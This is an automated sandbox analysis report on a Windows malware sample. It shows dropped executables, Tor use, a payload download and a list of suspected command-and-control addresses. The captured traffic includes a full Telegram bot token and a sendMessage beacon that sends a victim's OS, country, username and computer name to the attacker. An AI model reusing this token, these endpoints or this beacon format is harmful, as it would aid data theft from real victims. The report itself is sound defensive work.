Windows Analysis Report yt7dW9nyJK.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: yt7dW9nyJK.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 199.188.200.89:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

Source: yt7dW9nyJK.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbCD9E3BB-4D03-46BD-8615-75A902267162.logg6 source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 0000000E.00000003.2282653067.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	19_2_06290158
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then jmp 096774BCh	19_2_096759B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then jmp 096774BCh	19_2_096759B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	19_2_096759B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	19_2_096759B0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then jmp 0967B584h	19_2_0967B0E8
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-60h]	19_2_09672230
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then jmp 096786C1h	19_2_096784C0
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-60h]	19_2_0967222E
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	19_2_0967AAE9
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Code function: 4x nop then jmp 096774BCh	19_2_09676F56
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	25_2_6C190E40

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: securefirewall.portmap.io

Found Tor onion address

Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp

String found in binary or memory: To debug, this may helpWhat was %p doing in pending_entry_connections in %s?Closing one-hop stream to '%s/%s' because the OR conn just failed.entry_conn->socks_requestGiving up on enclave exit '%s' for destination %s.At %s:%d: %p was unexpectedly in circuit_wait. Closing.Application request to port %d: this port is commonly used for unencrypted protocols. Please make sure you don't send anything you would mind the rest of the Internet reading!%sREJECTWARNDANGEROUS_PORT PORT=%d RESULT=%sPort %d listed in RejectPlaintextPorts. Closing.exitoniononion Invalid %shostname %s; rejectingClient asked for %s:%d.exitThe ".exit" notation is disabled in Tor due to security risks.SOCKS_BAD_HOSTNAME HOSTNAME=%sUnable to automap address %sAutomapping %s to %sREVERSE[%s]Missing mapping for virtual address '%s'. Refusing.Onion address %s requested from a port with .onion disabledResolve requests to hidden services not allowed. Failing.Attachstream to a circuit is not supported for .onion addresses currently. Failing.Using previously configured client authorization for hidden service request.Got a hidden service request for ID '%s'addresstype == ONION_V3_HOSTNAMEfailed to parse hs addressNot fetching.Refetching.usableunusableFound %s descriptor in cache for %s. %s.Invalid service name '%s'No descriptor found in our cache for %s. Fetching.Unknown cache lookup error %dedge_conn->rend_dataedge_conn->hs_identDescriptor is here. Great.Stale automapped address for '%s.exit'. Refusing.Address '%s.exit', with impossible source for the .exit part. Refusing.!automapMalformed exit address '%s.exit'. Refusing.Unrecognized relay in exit address '%s.exit'. Refusing.Excluded relay in exit address '%s.exit'. Refusing.Destination '%s' seems to be an invalid hostname. Failing.Refusing to connect to non-hidden-service hostname or IP address %s because Port has OnionTrafficOnly set (or NoDNSRequest, NoIPv4Traffic, and NoIPv6Traffic).Refusing to connect to hostname %s because Port has NoDNSRequest set.Refusing to connect to IPv4 address %s because Port has NoIPv4Traffic set.Refusing to connect to IPv6 address %s because Port has NoIPv6Traffic set.Application asked to connect to port 0. Refusing.Rejecting request for anonymous connection to private address %s on a TransPort or NATDPort. Possible loop in your NAT rules?%sRejecting SOCKS request for anonymous connection to private address %s.%sRejecting SOCKS request for an IP address family that this listener does not support.Rejecting SOCKS4 request for an IPv6 address.Rejecting SOCKS4 request on a listener with no IPv4 traffic supported.Redirecting address %s to exit at enclave router %saddresstype == ONION_V2_HOSTNAME || addresstype == ONION_V3_HOSTNAMEWarning! You've just connected to a v2 onion address. These addresses are deprecated for security reasons, and are no longer supported in Tor. Please encourage the site operator to upgrade. For more information see https://blog.torproject.org/v2-deprecation-timelineCalled connection_a

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 193.161.193.99:31510
Source: global traffic	TCP traffic: 192.168.2.5:49725 -> 140.78.100.15:8443
Source: global traffic	TCP traffic: 192.168.2.5:49726 -> 185.119.118.59:8080
Source: global traffic	TCP traffic: 192.168.2.5:49729 -> 193.142.146.239:9001
Source: global traffic	TCP traffic: 192.168.2.5:49730 -> 95.217.36.40:9993

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /uploaded/JxTcJM84e3NbGP4mm.exe HTTP/1.1Host: libyaalahrar.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 193.161.193.99 193.161.193.99
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View	IP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: BITREE-ASRU BITREE-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	TCP traffic detected without corresponding DNS query: 51.158.147.144
Source: unknown	TCP traffic detected without corresponding DNS query: 51.158.147.144
Source: unknown	TCP traffic detected without corresponding DNS query: 51.158.147.144
Source: unknown	TCP traffic detected without corresponding DNS query: 72.132.134.217
Source: unknown	TCP traffic detected without corresponding DNS query: 72.132.134.217
Source: unknown	TCP traffic detected without corresponding DNS query: 72.132.134.217
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 51.158.147.144
Source: unknown	TCP traffic detected without corresponding DNS query: 51.158.147.144
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.118.59
Source: unknown	TCP traffic detected without corresponding DNS query: 140.78.100.15

Source: global traffic	HTTP traffic detected: GET /uploaded/JxTcJM84e3NbGP4mm.exe HTTP/1.1Host: libyaalahrar.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot7418591347:AAEKXYhE74Nv1aE3mDgf4CpgdjKv5Zj4PmU/sendMessage?chat_id=6878338460&text=%23%44%65%66%61%75%6C%74%20%20%23%42%65%61%63%6F%6E%0A%0A%3C%62%3E%4F%53%3A%3C%2F%62%3E%20%3C%69%3E%4D%69%63%72%6F%73%6F%66%74%20%57%69%6E%64%6F%77%73%20%4E%54%20%36%2E%32%2E%39%32%30%30%2E%30%3C%2F%69%3E%0A%3C%62%3E%43%6F%75%6E%74%72%79%3A%3C%2F%62%3E%20%3C%69%3E%55%6E%69%74%65%64%20%53%74%61%74%65%73%3C%2F%69%3E%0A%3C%62%3E%55%73%65%72%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%61%6C%66%6F%6E%73%3C%2F%69%3E%0A%3C%62%3E%43%6F%6D%70%6E%61%6D%65%3A%3C%2F%62%3E%20%3C%69%3E%31%32%38%37%35%37%3C%2F%69%3E%0A%0A%3C%62%3E%52%65%70%6F%72%74%20%73%69%7A%65%3A%3C%2F%62%3E%20%30%2E%31%34%4D%62%0A&reply_markup=%7B%22%69%6E%6C%69%6E%65%5F%6B%65%79%62%6F%61%72%64%22%3A%5B%5B%7B%22%74%65%78%74%22%3A%22%44%6F%77%6E%6C%6F%61%64%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%2C%7B%22%74%65%78%74%22%3A%22%4F%70%65%6E%22%2C%22%75%72%6C%22%3A%22%68%74%74%70%3A%2F%2F%31%32%37%2E%30%2E%30%2E%31%3A%31%38%37%37%32%2F%68%61%6E%64%6C%65%4F%70%65%6E%57%53%52%3F%72%3D%68%74%74%70%3A%2F%2F%31%38%35%2E%31%31%39%2E%31%31%38%2E%35%39%3A%38%30%38%30%2F%67%65%74%2F%64%30%4F%75%61%71%69%7A%66%7A%2F%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74%2E%77%73%72%22%7D%5D%5D%7D&parse_mode=HTML HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line?fields=query,country HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)
Source: tor-real.exe, 00000019.00000002.4504563243.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: tor-real.exe, 00000019.00000002.4504563243.0000000000F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.yahoo.comZ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: securefirewall.portmap.io
Source: global traffic	DNS traffic detected: DNS query: libyaalahrar.co
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://101.126.19.171:80
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://121.171.125.177:9000
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:2789/
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:2789/pData
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://129.151.109.160:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://149.88.44.159:80
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.141.24:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.141.8:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.142.3:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.142.6:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.143.23:8080
Source: ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.143.25:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.144.19:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.146.28:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.146.30:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.147.30:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://156.245.148.3:8080
Source: ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/d0Ouaqizfz/iAAD9_user
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/get
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002E65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/get/d0Ouaqizfz/iAAD9_user
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080t-cq
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:80
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://194.114.131.47:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://212.233.122.65:8000
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://216.39.242.18:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.110.140.182:8080
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.88.59.12:80
Source: ffmaba.exe, 0000000B.00000002.2257333436.000000000281D000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000013.00000002.4510696537.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, ffmaba.exe, 00000016.00000002.2326826871.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://47.96.78.224:8080
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: yt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2137223275.0000000002D14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000006.00000002.2114974841.000000000777D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microfZ
Source: yt7dW9nyJK.exe, 00000004.00000002.4535482777.0000000005F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: ffmaba.exe, 00000013.00000002.4510696537.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
